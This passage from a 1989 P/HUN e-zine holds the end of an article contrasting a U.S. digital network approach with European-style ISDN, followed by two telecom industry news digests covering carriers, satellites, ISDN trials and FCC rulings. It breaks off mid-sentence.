but none of the conference comittees proposed that the U.S. adopt ISDN totally, be- cause of the unique characteristics of the U.S. communications environment. THE U.S. COMMUNICATIONS ENVIRONMENT ----------------------------------- The unique U.S. communications industry characteristics that influence the USDN effort are described in the following section. These characteristics are summerized in Table 1, which compares the U.S. communications environment with the environment in other countries. The Competitive Marketplace: In the U.S., the privately managed telephone industry responds, rapidly to user demands for new services. In most other countries, however, services are established in a slow, deliberate program by one government-administrated source, usually the country's postal, telephone, and telegraph (PTT) agency. The users then decide if and how they will use the services offered. Technology Advances: Second only to the competitive marketplace, technology advances include component developments such as as memory devices, VLSI chip design, and optical elements. Developments in the system architecture, networking, and functional interfaces in transmission and switching technologies are equally important in defining the USDN concept. Less Restrictive National Standards: Because standards imply conformity, they can restrain innovation. Because they are not required to undergo a lengthy standards-approval cycle, U.S. manufacturers are free to produce systems that are incompatible with existing equipment. De facto standards are often established by the market's acceptance of a particular system. Comparing ISDN and USDN FEATURES CLASSICAL ISDN USDN ENVIRONMENT ENVIRONMENT -------- -------------- ---------------- Competition Essentially None Varied, encouraged by government Standard Inter- CCITT Essentially none exchange Carriers One, nationalized Many, equal access Existing Investment Due for replacement Huge, undepreciated investment Service Offerings By PTT schedule Entrepreneurial, competitive Implementation Cost Government-provided funds Private Capital Multiple Carriers and Competative Networks: The premise of ISDN is that a common national network will evolve, able to handle multiple voice and data services in an integrated fashion. ISDN thus precludes a carrier by-passing a local office or vying for customers' traffic through innovative techniques. In most countries other than the U.S., telephone companies are not legally required to provide or counter new service offerings. Integrated digital networks (IDNs) are emerging in the U.S. that provide digital access and transmission, in both circuit-switchhed and packet modes. The number of IDNs will probably increase regardless of whether an ISDN is proposed for the U.S. Embedded Investment: The U.S. has invested heavily in modern stored-program controlled (SPC) switching. However, other countries are only now facing conversion to SPC, as much of their existing systems investment is greatly depreciated. These countries can therefore converty to ISDN switching in a more orderly and economical fashion that the U.S. can. Thus the U.S. will have overlay networks, digital adjuncts to existing SPC switches, and multiple networks in the foreseeable future. EVOLUTION OF U.S. COMMUNICATIONS OFFERINGS ------------------------------------------ The American solutions to data transmission problems have tended to be faster, more practical, and less elegant than those evolving in Europe. Not surprisingly, the American solutions have generally ignored CCITT recommendations. For example, public packet-switched networks such as TYMNET, GTE Telenet, and Satellite Business Systems are offered to some customers with long-haul traffic. These systems were severly limited because they often required access through analog local office. Many major industries and private organizations thus established their own data networks, often point to point over leased circuts. Digital Terminating Service was introduced to provide 56K bit-per-second (up to 448K bit-per-second) links to the end user over special transmission links. Digital Electronic Message Service was recently approved to provide 1.5M bit-per-second service to the end user. Some suppliers are now offering PBXs with 64K bit-per-second local loops and direct pulse code-modulated (PCM) trunks to the public network. Two new standard 1.544M bit-per-second central office-to-PBX interfaces have been established, the Northern Telecom Computer-to-PBX-interface and the AT&T Information Systems Digital Multiplexed Interface. The Development of Local Area Networks: The increasing use of data terminals and the growth of distributed processing has led to the necessity of transporting data at rapid rates within a building or local area. This rapid local data transmission imposed impossible requirements on the conventional PBX. While PBX designers struggled to upgrade their data capabilities, computer manufacturers saw the oppertunity to offer local area networks (LANs) designed specifically to provide wideband data transport between users in a limited area. Again, expediency and the competitive climate produced a practical solution - several LANs with different architectures and protocols. In general, these LANs so not conform to the ISDN protocol levels identified in the International Standards Organization (OSI) models. However these LANs cannot be eadily replaced, so the USDN will have to accommodate them. A case in point is the apparent conflict between the ISO model of Open System Interconnection (OSI) and the IBM System Network Architecture (SNA). The OSI model of a seven-layered architecture for data networks has been defined for the first four layers only. International agreement on the remaining protocols will take several more years to obtain, if agreement on the remaining protocols will take several more years to obtain, if agreement is possible, Meanwhile, in the U.S., IBM defined a similar protocol, SNA, and has implemented numerous networks. Long before any ISO standard can be established, the U.S. will be well populated with SNA systems. The USDN must be at least compatible with SNA, and SNA could become the national standard. Because future PBXs will probably be able to switch synchronous data at 64K bits per second (and multiples therof, up to at least 1.544M bits per second), there may not be sufficient switched wideband traffic requirements to support a seperate LAN standard. Long-distance dedicated data services such as AT&T's ACCUNET and SKYNET are competing for data traffic. In addition, various data-over-voice (DOV) schemes have been employed over switched analog circuts. In short, many approaches, services, and facilities have already been implemented to satisfy the immediate market needs, without regard to an orderly transition to ISDN. Thus, the USDN will have to accomodate thesee established services and inteface with most of them. Introduction of Local Area Data Transports: Recently, electronic (carrier) serving areas have been replacing long local physical loops. These subscriber carrier systems provide such data capabilities as DOV and local area data transport (LADT). LADT offers a packet-switched data capability that may apply to both business and residential services; its low speed (up to 4.8K bits per second) and relatively low cost may make it universally attractive. LADTs may find widespread use for Videotex, meter reading, power load shedding, security reporting, and marketing transactions. Although LADT is restricted primarily to a local exchange area, the evolving USDN will provide transport between LADTs. LADT subscribers will access the USDN transport carrier through pooled local data concentrators. A typical LADT Data Subscriber Interface (DSI) unit will concentrate data from 124 subscribers to a 56K (or 9.6K) bit-per-second trunk to a packet network. A subscriber can thus dial up a DSI over a conventional voice loop and transport data through a modem (which may be a part of the terminal) by means of the switch. A direct access mode is also available with the subscriber loop terminating on the DSI, permitting independant simultaneous data and voice transmission. The X.25 link access protocol- balanced (LAPB) is used, but protocol conversion is restricted in many instances by federal rules. Although LADTs so not comply with any defined ISDN service, they are an integral requirement of the USDN. CSDC Technology: Circut-switched digital capability (CSDC) is another USDN service that has no ISDN counterpart. CSDC is an alternative voice- or data-switched circut with end-to-end 56K (or 64K) bit-per-second transparent connection ensured by dedicated trunk groups in each switching location. CSDC facilitates large, continuous, bulk data trans- fers, and its implementation requires added investment in each switch location as special terminal equipment. CSDC represents yet another expediant toward providing ISDN-like services while using existing investment. CSDC technology can also accomodate a full ISDN, if one ever evolves in the U.S. Digital Subscriber Loops: ISDN-compatible digital subscriber loops (two voice, plus one data channel at 144K bits per second) are recieving attention in the U.S., but the commercial implementation of this technology is not prograssing rapidly. Near-term subscriber loops will probably acquire data capability by data ober analog voice multiplexing. Although this step would not precluse the eventual inclusion of ISDN loops, it would tend to slow their introduction and widespread acceptance. Interfaces and Protocols: Although the ISDN revolves around the 30 channel PCM transmission format used in Europe, it does provide for the 24 channel- based systems used in the U.S. However, U.S. systems have many unique interface requirements. A new set of proposed services will require forwarding of the calling number for control or processing by either the terminating switching system or the called subcriber. Exchange of such information will likely be accomplished over a local area common channel signaling system or a fulll CCITT standard, signaling system #7 network. Direct data exchange between a network switching unit and a sata bank and/or processor facility will probably evolve from the current trunking scheme to a direct signaling carrier, perhaps CCITT standard #7 with OSI and/or SA protocols. Calls to cellular mobile roamers (i.e., mobile units that have traveled outside their base area) will probably be routed to a central data base for locating routes. A personal locator service for automatically routing calls to the unit's temporary location will require unique system interface and protocols. Privately owned transaction networks may provide this unique interface. While the objective is to eventually use CCITT standard #7 as a vehicle and X.25 as an interface protocol, the USDN must embrace a wide assortment of formats, protocols, and interfaces for the near future. TRANSMISSION TECHNOLOGY TRENDS Ultimately, subscriber loops in the U.S. will be digital, providing two 64K bit-per-second voice or data channels (i.e.,two B channels) and one 16K bit-per-second voice or data channels (i.e., two B channels) and one 16K bit-per-second data only (i.e., one D channel). The 16K bit-per-second channel will probably permit an 8K bit-per-second user data channel or submultiplexed channels of a lower bit rate. Full-duplex (i.e., four wire) operation will be provided by echo-canceling techniques over existing two-wire loops. An alternative approach of time-domain multiplexing may also be used, especially in the neat term. Local Loops: Although modems will not be required at either end of the local loop, network terminating equipment will be required to serve as the multiplexor and, perhaps, as voice CODECs. Users of such circuts can have full, simultaneous, reall-time voice and data channels, as well as seperate control, metering, and low-speed data transmission. With advanced switching centers, each circut can be routed and billed independently. Existing 56K bit-per-second channels on conventional 24-channel digital carrier systems will be replaced by or supplemented with 64K bit-per-second clear channels with extended framing. The local loop plant in many areas is already migrating toward carrier- serving areas, implemented by a subscriber carrier capable of digital transmission. Some local telephone companies are installing glass fiber in their local plants in preparation for the downward migration of direct digital transmission. However, until full, ISDN-type local loops are universally available, near-term adaptations will be offered to satisfy market needs and to prevent users from seeking other communications facilities. Wideband Circuts: Wideband circuits (i.e., multiples of 64K bits per second) over the public switched network may become feasible as newer switching elements are used. Although some transmission links may soon be able to combine DS-O channels for real-time wideband service, limitations in switching centers will restrict their general use. Seperate wideband switching modules, multiplexing on CATV, or extension of wideband LANs may ultimately appear if the need for wideband transmission remains strong. Packet Transmission: Packet transmission is an inherent element of the ISDN. However, the USDN must handle separate packet networks, separate facilities, separate routing, and even separate providers. It is unlikely that American packet networks in the U.S. will ever be combined into an integrated, single-network ISDN. Therefore, the USDN must accommodate such overlay networks and the associated problems of routing, protocol conver- sion, circuit maintenance, billing, and network management. American users will demand and recieve more options for data transport, data processing, and support services than any single network is likely to provide. SWITCHING TECHNOLOGY TRENDS Implementing ISDN standards on the switching systems already in place throughoout the U.S. is a formidable task. Most local end offices have been replaced by SPC analog switches within the past decade. More recently, SPC digital switches have been installed, and this trend will probably accelerate through the 1990s. However, these newer switches are third- generation design; that is, they are designed primarily to handle conventional voice circuit switched traffic within a hierarchical network. These switches are not optimized for data handling, multiple networks, or sophisticated user needs. Although hardware retrofits and software patches are being applied to accommodate LADT, CSDC, and digital loops, such solutions result in limited user services, higher costs, and more complex maintenance requirements. Fourth-Generation Switching: Fourth-generation switching systems, design- ed for USDN requirements, are beginning to appear. A fourth-generation switch is optimized for data; voice switching is simply a special case of data transmission at speeds of 64K bits per second, 32K bits per second, or any other evolutionary compressed voice bit rate. Fourth-generation switches do not have central processors. Each functional unit (e.g., lines or trunks) contains its own processing hardware and software to output packet-format messages (i.e., containing a header message and a data byte) in a uniform deferred format. (The data byte may be a digitized voice sample.) These packets then are routed through a central matrix, which also contains sufficient processing power to route packets to their interim or final destination with only the data contained in the header bits of the call itself. Services such as route translation, tone reception, billing recording, and termination functions are inserted into a call in progress by routing the call packets to specific functional modules on demand. The modules perform the required call functions and return the packetsto the matrix. (or interal network). When the required call-handling functions have been sequentially accomplished, the call is terminated to the desired port and a virtual circuit is established between the calller and called terminals. During the call, the packet header provides control and supervision and performs routine maintenance and alarms. A fourth-generation switch performs required functions-Centrex attendants, toll operators, common-channel signaling, or LAN termination-when the appropriate module is simply plugged in. These functions do not affect existing system service or capacity. Ideally suited to the USDN, the fully distributed control architecture of a true forth-generation switch could also meet the longer-range objectives of the ISDN. Because they do not require a large, costly central processor complex, fourth-generation switches can be economically applied as add-on units or adjuncts to existing SPC switches. Fourth-generation switches thus provide advanced capabilities without the necessity of replacing or retrofitting the existing switches. Some features that can be provided as adjuncts are described in the following paragraphs. Special Services: In the U.S., services that require more sophisticated transmission that provided by standard telephone lines are expanding rapidly. By the end of the 1980s, 50 percent of all lines may require some special treatment. A USDN switch, or a special service adjunct can provide univer- sal line circuits that can be remotely administered for transmission balance, type of transmission, routing, and signaling. The special service adjunct can provide various voice and data arrangements and automatic facilities testing as well as provide and maintain sophisticated data and voice services, often without changing the user's original telephone number. Business Services: Integrated toll, local, Centrex, PBX, and instrument/ terminal systems are not provided in the U.S. because of its regulatory climate. Regulations controlling enhanced services, authority to provide services, equal-access provisions, and franchising of special carriers and servers all affect the USDN but are constraints in the ISDN plans. Because of the uncertainty and ambiguity in such regulatory matters, the business services adjunct can be used with less economic risk than replacing or retrofitting existing switching systems would incur. The business services adjunct permits the existing local office to continue providing the local telephone service for which it was optimized. The business services adjunct can also economically provide such features as: * Citywide, Centrex-like service with universal numbering among user locations. * Centralized attendants and night service * Direct data lines at 64K bits per second * Rerouting of existing PBX trunks with improvement in features * Lan termination for PBX-to-Lan connections and LAN-to-LAN bridging. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P/HUN Issue #4, Volume 2: Phile 10 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD __________________________________ | | | P/HUN Telecom News/Advancements | | PART 1 | | By DareDevil | |__________________________________| Feb. 17-19, 1989 SATELLITE USE WILL KEEP SOARING: Satellites and fiber-optic cables will be used for international communications well into the 21st century, according to a Communications Satellite Corp. study. The study suggests that services using satellite systems could be up to 45% less expensive than international transmissions that use fiber. Also giving satellites staying power: Ability to reach remote areas. RCI SENDS CALLS OVER THE WATER: RCI Long Distance, a subsidiary of Rochester Telephone, said Thursday that it has added 122 countries to its international service, including popular calling areas such as West Germany and Israel. Rates: RCI says only that the service will be priced competitively with other carriers offering international services. PROGRAM PUTS NETWORK ON THE MAP: A computer program from Connections Telecommunications can be used by network designers to create a visual map of their wide-area network, reports Computerworld magazine. The program, called Mapconnect, will superimpose over a map of the USA the serving office, hubbing point and area sites with their connections. Cost: $2,000 per copy, plus $400 annual maintenance after the first year. CALIFORNIA, MORE FIRMS COMPETE: Competition for local access and transport area data transmissions to long distance carriers has been strengthened in California by a recent PUC decision. The commission approved a deregulation plan that will likely have MCI, US Sprint and Cable and Wireless Management Services competing with Pacific Bell and GTE California, says CommunicationsWeek. VERMONT TO UPGRADE TELE SYSTEM: The State of Vermont will be getting technical support for improvements in its telecommunications network from Federal Engineering Inc., according to CommunicationsWeek. Contract value: Not revealed. Federal Engineering has provided similar service in Montana, New Mexico, North Dakota, Virginia and Wyoming. CAMPUS GETS BIG DOSE OF HI-TECH: Southwestern Bell is putting more than 40 miles of high-speed fiber optics into the St. Louis Community College system, reports CommunicationsWeek. The network will link the school's 3 campuses and headquarters to provide video, voice and data transmissions for educational programs. Cost to the school: $580,000, plus $2,000 per month to use the system. SOMEONE MIGHT BE LISTENING: About 30 hours worth of recorded audio-visual material was recorded by New York City residents recently for transmission into outer space, reports InfoText magazine. AT&T set up the free service at its headquarters. Messages were beamed into space on the company's satellite dishes. Among the messages: A young student reported on a pro basketball game for any interested "aliens." ------------------------------------------------------------------------------- Feb. 20, 1989 AT&T PLANS OVERHAUL: AT&T announced a sweeping overhaul Friday designed to make the long-distance company more competitive and profitable. AT&T will split its 5 business groups into 12 units to 25 units that each will have sole responsibility for a product or service. The idea will be phased in over a period of months this year. (For more, see special AT&T package below. From the USA TODAY Money section.) JAPAN SET FOR JUNGLE LAUNCH: The first of 2 satellites for the Japan Communications Satellite Co. lifts off Feb. 28 from a jungle launch pad in French Guiana. The launch will inaugurate commercial satellite communications in Japan and be the first of Hughes Communications' new HS 393 series. The satellite will begin serving the Japanese islands, including Okinawa, after a 30- to 60-day testing period. SATELLITE HAS MANY CUSTOMERS: The JCSAT 1 satellite going into orbit on Feb. 28 will provide the Japanese islands with various new services. Scheduled to come off the satellite: Network and cable TV distribution, used-car auctions, prep school classes, religious programming, automobile dealer training, a specialized engineering video network. Also: A business group plans to offer business communications. BIG SATELLITE WON'T BE THE LAST: With a deployed height of 10 meters, the Hughes Communications' satellite being launched by Japan next week will be the largest Hughes commercial satellite ever launched. It contains 32 transponders, each one capable of transmitting one TV channel, 45 million bits of data per second, or more than 250 telephone circuits. Japan will launch a second satellite this summer. SPACE STATION MAKES AUDIO PLANS: NASA has chosen Harris Corp. audio communications systems for use on the space station Freedom, scheduled for operations in 1995. CommunicationsWeek says that under a $35 million subcontract with Boeing Aerospace, Harris will design, develop and produce systems for onboard use. Special feature: At times when crew members have their hands busy, a voice recognition capability will be available. CHINA SPRINTS FOR THE MICROWAVE: About 90% of its surplus microwave network has been sold or dismantled by US Sprint, according to CommunicationsWeek. The old equipment is being replaced by a fiber network. Most recently, the People's Republic of China spent about $15 million for 6,000 used analog microwave radios and 600 parabolic antennas. China plans to use the equipment on 11 existing microwave networks. NYNEX BEGINS ANOTHER TEST: Nynex is providing a digital data-over-voice private-line access service for Telenet Communications in a New York City field trial. It is one of 35 basic service elements Nynex specified in its Open Network Architecture plan for the FCC, reports CommunicationsWeek. Nynex expects to present 14 other new offerings before the end of the year. BOSSES GET MORE RESPONSIBILITY: The reorganization plan announced by AT&T Friday is the first major policy move by Robert E. Allen since he took over last April as chairman. The goal: Get managers to focus more on customers and on costs by giving them total responsibility for any money they make or lose. Right now most of that responsibility is held by top managers at AT&T. AT&T HOPES FOR BIGGER SALES: The AT&T move to split its business groups comes at an opportune time. AT&T is losing market share in the long-distance phone market to rivals MCI and US Sprint. Also: AT&T's overall sales growth has been modest over the last several years. Under the new plan, the presidents of AT&T's 5 operating groups will be renamed group executives. The new units will operate as independent businesses. NEW APPROACH MIGHT START SLOWLY: Analysts say it will take years to streamline AT&T's bureaucracy and get managers accustomed to being directly accountable for the performance of their businesses. AT&T reported a loss of $1.67 billion on sales of $35.21 billion in 1988. Earnings were reduced by a net charge of $3.94 billion from writing off old equipment and accelerating modernization of its long-distance network. ------------------------------------------------------------------------------- Feb. 21, 1989 DATA CROSSES MILES WITH SPEED: Northern Telecom yesterday announced the availability of the High Speed Data Module, a data connectivity device that is an addition to the Meridian SL-1 Data Services product line. A typical application might involve a bank that uses the module to connect a programming facility with the bank's main data center, located approximately 400 miles away. Cost: $725. INMATES TOUCH, SAVE AND LOSE: Some 15 inmates from local prisons in the Nashville, Tenn., area face computer fraud charges after figuring out Touch & Save long-distance phone customers' user codes. Officials say the inmates charged more than $2,000 in calls. The inmates gained access to the codes and sold them for $5 or more to others in the prison. (From the USA TODAY News section.) PRODUCTS WILL PROTECT DATA: CompuServe Inc. has introduced new encryption products for its public packet data network, Network World reports. The encryption services let users move data from expensive leased lines to cost-effective dial-up public circuits, while protecting the data from unauthorized access. The cost ranges from $1,495 to $8,100. PROTEON UNVEILS FIBER MODEM: Proteon Inc. has developed a single-mode, fiber-optic modem that will extend the distance between 2 nodes on a token-ring network, says Network World. The p3282 modem permits 2 nodes to communicate over a maximum distance of 30 kilometers without using a repeater. The fiber also uses optical laser technology instead of LEDs for transmission of the signal. Cost: $10,000. NETWORK CHARGES ARE DROPPED: Transettlements Inc. has stopped making additional charges for internetwork transmission, reports Computerworld magazine. The firm will no longer charge its users fees, penalties or premiums for interconnection with other value-added networks. The charge for going through 2 networks will be the same for going through only Transettlement's network. AIRLINES, HOTELS JOIN NETWORK: GEnie, a consumer online information service from GE Information Services, is now offering the Official Airline Guide Electronic Edition Travel Service. The edition will permit GEnie subscribers to view airline schedules, fares and hotel information. Cost: A surcharge on GEnie of 17 cents/minute during non-prime hours and a surcharge of 47 cents/minute during prime time. RESERVATIONS ARE A TOUCH AWAY: Harrah's Reno introduced a guest service center at the Reno Airport yesterday that uses interactive, live video to streamline guest reservations. Guests can check into Harrah's, make dinner reservations and arrange to see a show by touching a TV screen. The system uses Nevada Bell's new ISDN network that allows voice, data and video communications to use fiber optic wires simultaneously. ------------------------------------------------------------------------------- Feb. 22, 1989 PHONE USERS DO IT THEMSELVES: US West's 35,000 Bellingham, Wash., customers will test the first of what could be a major telephone innovation: Instantaneous, do-it-yourself phone service. In the plan, a person could shut off service, have a 3-way holiday conversation and have calls sent to work - all by dialing a series of numbers. (For more, see special Phones package below.) SATELLITE TO SERVE INDONESIA: Scientific-Atlanta has been selected to supply a half dozen major communication systems in the Pacific Rim: A VSAT satellite link for Indonesia and 5 private television networks for Japanese firms. The satellite network will provide interactive data, video and voice communications to as many as 4,000 sites on the 13,677 islands that make up the Republic of Indonesia. NETWORKS TO GO ON NEW SATELLITE: Nippon Telephone & Telegraph Co. of Tokyo and 4 other Japanese companies said yesterday they will use Scientific-Atlanta's B-MAC satellite technology to establish 5 private business television networks in Japan. When their private television networks are completed, Nippon, Nikken, Telecom Sat and Video Sat plan to send video signals to JC-Sat, Japan's new communications satellite. TELCO ENTRY IS UNPREDICTABLE: Congress will probably not address the issue of telephone companies entering the TV business in the near future, National Assn. of Broadcasters President Eddie Fritts tells Broadcasting magazine. He says the telco entry will be one of the top issues of the 1990s. But he stops short of making predictions, saying only that free over-the-air broadcasting will survive. MORE STATIONS PICK UP SATELLITE: Satellite-delivered talk-radio programs are growing as AM station directors look more closely at the potential of low-maintenance, national talk shows. Broadcasting magazine says the 3 month-old American Radio Networks joined the field with 22 affiliates and now has 110 stations receiving its 24-hour satellite service. SATELLITES FLY FOR GERMAN TV: Highly competitive satellite and cable TV services are expected to grow significantly during the next 2 years in West Germany, according to Broadcasting magazine. West German private TV channel RTL Plus, a satellite-to-cable service, is expected to expand its market to 10 million viewers. U.S. firm Capital Cities/ABC has a holding in Tele-Munchen, part owner of the Tele5 satellite channel. SPECIAL PACKAGE ON PHONES: ------------------------- SERVICE COULD START IN A SNAP: Customers moving into new homes could start phone service within minutes by dialing telephone responses to a series of computer-voiced questions with a new service being tested by US West Communications. Officials liken the change to the switch from operator-assisted to direct-dial local calls in the 1920s or the similar change in long-distance calls in the 1950s. SERVICE COULD LINE THE WEST: If an upcoming test of do-it-yourself phone service works in Bellingham, Wash., another 2-year test will be done on the same service in a larger market, such as Denver. If that also goes well, the entire US West market - 14 states - will get the new system by the year 2000. Throughout the test, all customers still will be able to use their telephones as they now do. FEATURES ARE A BUTTON AWAY: US West customers with do-it-yourself service will be able to start or stop telephone feature services at any time, including such commonly used services as call forwarding and 3-telephone conversations. These services already are available, but only by calling US West sales representatives during daytime business hours. The new system will allow changes to be made at any time. ------------------------------------------------------------------------------- Feb. 24-26, 1989 CELLULAR SIGNAL GOES FARTHER: Pacific Telesis has installed antennas at both ends of an Oakland, Calif.-area tunnel to carry signals from cellular car telephones, reports Forbes magazine. Also: PacTel is using a solar cell to power a repeater signal and extend coverage into Laguna Canyon. Forbes says the developments are indications of coming improvements in cellular transmissions. THE AIRWAVES ARE CROWDED: The main problem for cellular phone users in large metropolitan areas is the addition of new subscribers to already jammed cellular systems, reports Forbes magazine. The FCC has allocated only 437 channels of radio waves to each carrier. To add customers, systems have been subdividing cells, with each cell having low-power antennas that operate in limited boundaries. SENDING COSTS WOULD BE HALVED: Digital cellular technology could solve the problem of cramped airwaves for cellular telephone systems, reports Forbes magazine. With digital, ordinary radio interference is eliminated, conversations are private, data from laptop computers can be sent to the office from the road. Also: Digital cellular would cost about half the transmission price because it's twice as fast. LOYOLA PLANS FOR ISDN USE: AT&T recently said that the Definity 75/85 communications system will be the base for an Integrated Services Digital Network that will carry voice, data and images for Loyola University. Computerworld says Loyola is expected to be the first commercial customer to use Definity. By early next year about 7,000 phones on the 3 Chicago-area campuses will be on the system. TELENET LINKS WITH STRATACOM: Telenet Communications has made an agreement with Stratacom Inc. to develop the technology for what the companies said will be the first broadband Integrated Services Digital Network service to be based on the ISDN frame relay interface, reports Computerworld. Telenet, a subsidiary of U.S. Sprint, will integrate packet switches with Stratacom digital multiplexers. THE PHONE IS IN THE BANK: Banks are playing it smart with their money and are winning price concessions from telephone companies by pitting carriers against one another, reports Network World. Some banks are negotiating for new services; others are cutting costs by striking custom contracts with local carriers. Example: Irving Trust of New York used MCI and AT&T to get a new international calling service. CIA HELP IS NO SECRET: The CIA linked its electronic-mail systems together with the help of Soft-Switch, a company in Wayne, Pa., that specializes in connecting multivendor E-mail systems, reports Government Computer News. A key function of the software package: Directory services that maintain information on all mail systems directly or indirectly connected to the software. FCC GETS COMPLAINT ON PACBELL: Conference-Call USA, based in Chicago, has filed a complaint with the FCC, accusing Pacific Bell of refusing to change its practice of automatically routing all conference-call traffic to AT&T, reports CommunicationsWeek. The firm says the practice is stunting the growth of competitive companies. STUDENTS ARE ON THE PHONE: School children in Denver are using computers and transmission facilities from US West Advanced Technologies to communicate with teachers, special subject experts and other students. CommunicationsWeek says the equipment will be given to the school system at the end of the school year. US West is using information gained from the trial to plan an information gateway in Omaha, Neb. HEARING IMPAIRED CAN MAKE CALLS: The State Relay Center is scheduled to begin service Friday in Birmingham, Ala. The new relay center was created to link hearing-impaired customers by teletype to people they want to call. The service is funded by a small surcharge on all phone bills in the state. ------------------------------------------------------------------------------- Feb. 28, 1989 CALLERS MUST BE TOLD THE COST: The FCC yesterday ordered 5 companies that charge customers 20% to 80% more than AT&T, MCI or Sprint to toe the line. The alternative operators must now tell callers how much the call will cost and which company is placing it before it goes through. The high rates usually are placed on hotel, airport or hospital phones. (From the USA TODAY News section.) FIRMS GIVE A PART OF REVENUES: The phone companies told by the FCC yesterday to reveal costs: Central Corp., International Telecharge Inc., National Telephone Services Inc., Payline Systems Inc. and Telesphere Network Inc. Right now all these companies buy phone time from a major carrier such as AT&T and MCI and then give the hotel, airport or hospital that uses the service a cut of revenues from every call. CALLERS WILL GET MORE RIGHTS: The FCC said yesterday that alternative long-distance operators must: Put a sticker on the phone with price information or tell the caller the price verbally; give callers an chance to hang up without any charge; offer callers a chance to go through AT&T or another phone service. Right now many alternative operators stop you from using another carrier. NISSEI PLANS A FAX EXPANSION: Portable facsimile machine manufacturer Nissei says that a major expansion of its operations will be completed within 2 months. To come: As many as 5 new fax machines, a revamping of the field staff to cover all sales territories. Also: Vice President John Haggerty says Nissei will move into other areas of the retail information technology market. BELL GOES TO COLLEGE: Bell Atlanticom Systems said yesterday it has signed a contract with the College of William and Mary in Williamsburg, Va., for a fully integrated voice and data communications system. The campus-wide system will provide resale of communications services to students, a management system, and a universal wiring plan to provide voice and data transmission. SYSTEM INCLUDES TRUNKS, LINES: The communications system obtained by the College of William and Mary yesterday will provide 300 trunks, 3,800 faculty and student lines, 150 voice/data faculty users and 1,050 host data ports. It includes more than 5,000 inside wiring runs and several miles of fiber optics. Also included: A 1,000-user Aspen Voice Mail System and the Alex-IS Telecommunications Management System. MESSAGES GO AROUND THE GLOBE: GE Information Services has announced a new capability of its QUIK-COMM System (electronic mailbox service) which enables users to send QUIK-COMM messages to facsimile machines throughout the world. Receiving fax machines must be Group III facsimile terminals that conform to CCITT standards. Recipients do not have to be QUIK-COMM System subscribers to receive the fax document. MCI GETS THE INSURANCE: Northwestern Mutual Life Insurance Co. said yesterday it has selected MCI Communications to replace AT&T's data network with a nationwide data communications network linking Northwestern Mutual's Milwaukee-based home office with its remote general and district agency offices. The 3-year, multimillion dollar agreement will eventually link more than 200 agency offices. BELLSOUTH GETS CLOSER TO EUROPE: BellSouth Corp. has signed a definitive agreement to purchase Air Call Holdings' shares in Air Call Communications, providers of cellular, paging and telephone answering and telemarketing services in the United Kingdom, Ireland and continental Europe. BellSouth provides mobile systems services in the USA, Argentina, Australia, Ireland and Europe. SYSTEM OFFERS NEW OPTIONS: New networking and programming capabilities for the McDonnell Douglas REALITY Operating System are being scheduled for beta testing at several customer sites, the company said yesterday. Dubbed ROS 7.0, the system will offer capabilities previously unavailable in PICK systems. Also: Data and processing can be distributed transparent to users and, in cases, the programmer. ------------------------------------------------------------------------------- P/HUN Issue #4, Volume 2: Phile 11 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD __________________________________ | | | P/HUN Telecom News/Advancements | | PART 2 | | By DareDevil | |_________________________________| March 3-5, 1989 PHONE LINES ARE SIMILAR: The USA's major long distance phone services aren't that different. A comparison of AT&T, MCI Communications Co. and Sprint Communications Co. in the March Data Communications magazine found, for instance: Calls placed over Sprint lines were slightly louder than those placed over AT&T or MCI lines. All the calls, however, could be heard clearly. (From the USA TODAY Money section.) SPRINT WAS MOST ACCURATE: A study by Data Communications magazine says AT&T connected its calls more quickly than other carriers. On average, it took 9.8 seconds to connect an AT&T call; 12.9 seconds for Sprint; 13.7 seconds for MCI. Also: Sprint had the fewest foulups. Only 2.3% of the calls on its lines failed to go through on the first try; 4.9% for AT&T; and 7.3% for MCI. CRITICAL FIRMS CALL SURVEY FAIR: When information was sent from one computer to another over phone lines during a study by Data Communications magazine, AT&T had the fewest glitches. Next best: Sprint, then MCI. The magazine placed 150-180 calls over the trio's phone lines between 4 cities last fall. Companies response: All had criticisms of the comparison but, overall, said results appeared to be fair. PHONE FIRM ELIMINATES CHEMICAL: AT&T says it's saving the ozone layer. The company says it has developed a way to eliminate the chemical CFC-113 from a process it uses to make electronic circuit boards. Scientists say the chemical may damage the ozone layer of the earth's atmosphere, which protects people from dangerous ultraviolet rays from the sun. (From the USA TODAY Money section.) SERVICE STOPPED IN CANADA: Bell Canada has decided to end its 976 phone service in all of its service regions, Telecommunications magazine says. The firm said significant increases in cost and an anticipated decline in revenues as primary factors in making the decision. Bell Canada is the nation's largest telecommunications operating company. MCI FAX HAS SEVERAL FEATURES: MCI has moved fast on fax. Telecommunications magazine reports that MCI has become the first long-distance company in the USA to offer a dedicated network for domestic and international fax transmissions. Called MCI FAX, the service will include management information reports, customized dialing plans, credit card billing and other features. ------------------------------------------------------------------------------- March 8, 1989 PACBELL TRUNK FEES SHOOT HIGHER: Costs on Pacific Bell's Assured PBX Trunk Line Service have jumped nearly 50%, according to Network World. The increase was made after the California Public Utilities Commission approved a PacBell plan to create a new trunk service and raise rates for what was once the only grade of service available. One firm with 2,000 trunks will pay about $96,000 more per year. BELL PUTS FIBER INTO LAUNCH: Southern Bell and Bell Communications Research engineers are working with NASA to prepare for a high definition TV taping and transmission of the launch of the space shuttle Discovery. Broadcasting magazine says Southern Bell and Bellcore are handling a live fiber-optic transmission of the launch. A temporary studio has been built at Kennedy Space Center. RATES WILL DROP IN ALABAMA: The Alabama State Public Service Commission said in Montgomery yesterday that phone rates will soon drop in the state. Ordered: South Central Bell must reduce rates by $9 million by April. Cuts: 25 cents off the monthly Touch-Tone service; the elimination of the Touch-Tone installation fee. SATELLITE FLIES FOR JAPAN: The next launch of Arianespace is scheduled for the end of March. Using the ELA 1 launch complex, an Ariane 2 launch vehicle will place into orbit the Swedish direct broadcasting and communications satellite TELE-X. The group last Saturday launched the first Japanese telecommunications satellite JCSAT 1 and the first European meteorological satellite MOP 1. OPTIONS ADDED TO VOICE LINE: VoiceCom Systems has added 3 new service options to its voice messaging product line, extended its worldwide communications network, and created a new business unit to develop and implement custom voice response applications. VoiceCom also introduced Guest Mailbox service, which allows VoiceCom customers to temporarily assign special voice mailboxes to their customers and vendors. MODEMS ARE SLEEK, SOPHISTICATED: Some modems are being marketed like sleek sports cars. General DataComm Industries is touting 2 new leased-line modems for 9,600-bit-per-second data communications as "the perfect balance of 